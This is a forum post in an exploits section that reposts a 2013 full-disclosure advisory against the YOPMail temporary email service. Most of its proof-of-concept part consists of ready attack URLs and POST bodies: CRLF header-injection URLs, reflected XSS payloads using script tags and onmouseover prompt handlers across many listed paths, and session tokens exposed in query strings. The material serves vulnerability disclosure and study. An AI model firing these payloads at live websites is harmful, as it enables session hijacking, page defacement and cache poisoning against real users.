Jump to content
Matt

YOPMail XSS / Injection / HTTP Response Splitting

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.

Author : Juan Carlos Garcia

Source : YOPMail XSS / Injection / HTTP Response Splitting ? Packet Storm

Code : 

YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01:     Researcher Notification 
2013-06-03:     RESPONSE
2013-06-07:     Ask About the issues
2013-06-10:     Vendor Feedback
2013-06-13:     Not Fixed
2013-06-16:     Ask About the Issues
2013-06-27:     Not Fixed / Not Response
2013-06-28:     Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /

#Vendor:http://www.yopmail.com

#Author:Juan Carlos García (@secnight)

#Follow me 
 http://www.highsec.es
 http://hackingmadrid.blogspot.com
Twitter:@secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days. 
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are 

downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers 

are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user 

defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a 

manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..

Affected items
/add-domain.php 
/alternate-domains.php 
/alternate-email-address.php 
/conditions.php 
/contact.php 
/definitions/email-jetable.php 
/definitions/mail-anonyme.php 
/definitions/spam.php 
/donation.php 
/email-anonyme.php 
/email-generator.php 
/en 
/en/add-domain.php 
/en/alternate-domains.php 
/en/alternate-email-address.php 
/en/conditions.php 
/en/contact.php 
/en/definitions 
/en/definitions/email-jetable.php 
/en/definitions/mail-anonyme.php 
/en/definitions/spam.php 
/en/donation.php 
/en/email-anonyme.php 
/en/email-generator.php 
/en/faq.php 
/en/images 
/en/index.php 
/en/plugins.php 
/en/privacy.php 
/en/send-mail.php 
/en/style 
/en/style/pic 
/en/yopmail-chat.php 
/es 
/es/add-domain.php 
/es/alternate-domains.php 
/es/alternate-email-address.php 
/es/conditions.php 
/es/contact.php 
/es/definitions 
/es/definitions/email-jetable.php 
/es/definitions/mail-anonyme.php 
/es/definitions/spam.php 
/es/donation.php 
/es/email-anonyme.php 
/es/email-generator.php 
/es/faq.php 
/es/images 
/es/index.php 
/es/plugins.php 
/es/privacy.php 
/es/send-mail.php 
/es/style 
/es/style/pic 
/es/yopmail-chat.php 
/faq.php 
/fr 
/fr/add-domain.php 
/fr/alternate-domains.php 
/fr/alternate-email-address.php 
/fr/conditions.php 
/fr/contact.php 
/fr/definitions 
/fr/definitions/email-jetable.php 
/fr/definitions/mail-anonyme.php 
/fr/definitions/spam.php 
/fr/donation.php 
/fr/email-anonyme.php 
/fr/email-generator.php 
/fr/faq.php 
/fr/images 
/fr/index.php 
/fr/plugins.php 
/fr/privacy.php 
/fr/send-mail.php 
/fr/style 
/fr/style/pic 
/fr/yopmail-chat.php 
/index.php 
/it 
/it/add-domain.php 
/it/alternate-domains.php 
/it/alternate-email-address.php 
/it/conditions.php 
/it/contact.php 
/it/definitions 
/it/definitions/email-jetable.php 
/it/definitions/mail-anonyme.php 
/it/definitions/spam.php 
/it/donation.php 
/it/email-anonyme.php 
/it/email-generator.php 
/it/faq.php 
/it/images 
/it/index.php 
/it/plugins.php 
/it/privacy.php 
/it/send-mail.php 
/it/style 
/it/style/pic 
/it/yopmail-chat.php 
/pl 
/pl/add-domain.php 
/pl/alternate-domains.php 
/pl/alternate-email-address.php 
/pl/conditions.php 
/pl/contact.php 
/pl/definitions 
/pl/definitions/email-jetable.php 
/pl/definitions/mail-anonyme.php 
/pl/definitions/spam.php 
/pl/donation.php 
/pl/email-anonyme.php 
/pl/email-generator.php 
/pl/faq.php 
/pl/images 
/pl/index.php 
/pl/plugins.php 
/pl/privacy.php 
/pl/send-mail.php 
/pl/style 
/pl/style/pic 
/pl/yopmail-chat.php 
/plugins.php 
/privacy.php 
/ru 
/ru/add-domain.php 
/ru/alternate-domains.php 
/ru/alternate-email-address.php 
/ru/conditions.php 
/ru/contact.php 
/ru/definitions 
/ru/definitions/email-jetable.php 
/ru/definitions/mail-anonyme.php 
/ru/definitions/spam.php 
/ru/donation.php 
/ru/email-anonyme.php 
/ru/email-generator.php 
/ru/faq.php 
/ru/images 
/ru/index.php 
/ru/plugins.php 
/ru/privacy.php 
/ru/send-mail.php 
/ru/style 
/ru/style/pic 
/ru/yopmail-chat.php 
/send-mail.php 
/uk 
/uk/add-domain.php 
/uk/alternate-domains.php 
/uk/alternate-email-address.php 
/uk/conditions.php 
/uk/contact.php 
/uk/definitions 
/uk/definitions/email-jetable.php 
/uk/definitions/mail-anonyme.php 
/uk/definitions/spam.php 
/uk/donation.php 
/uk/email-anonyme.php 
/uk/email-generator.php 
/uk/faq.php 
/uk/images 
/uk/index.php 
/uk/plugins.php 
/uk/privacy.php 
/uk/send-mail.php 
/uk/style 
/uk/style/pic 
/uk/yopmail-chat.php 
/yopmail-chat.php 
/zh 
/zh/add-domain.php 
/zh/alternate-domains.php 
/zh/alternate-email-address.php 
/zh/conditions.php 
/zh/contact.php 
/zh/definitions 
/zh/definitions/email-jetable.php 
/zh/definitions/mail-anonyme.php 
/zh/definitions/spam.php 
/zh/donation.php 
/zh/email-anonyme.php 
/zh/email-generator.php 
/zh/faq.php 
/zh/images 
/zh/index.php 
/zh/plugins.php 
/zh/privacy.php 
/zh/send-mail.php 
/zh/style 
/zh/style/pic 
/zh/yopmail-chat.php 

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-

1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-

dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-

7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt

%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-

0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. 

URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21) 
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1) 
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3) 
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca) 
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-

1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst



IV. CREDITS
-------------------------

This vulnerabilities has been discovered
by Juan Carlos García(@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...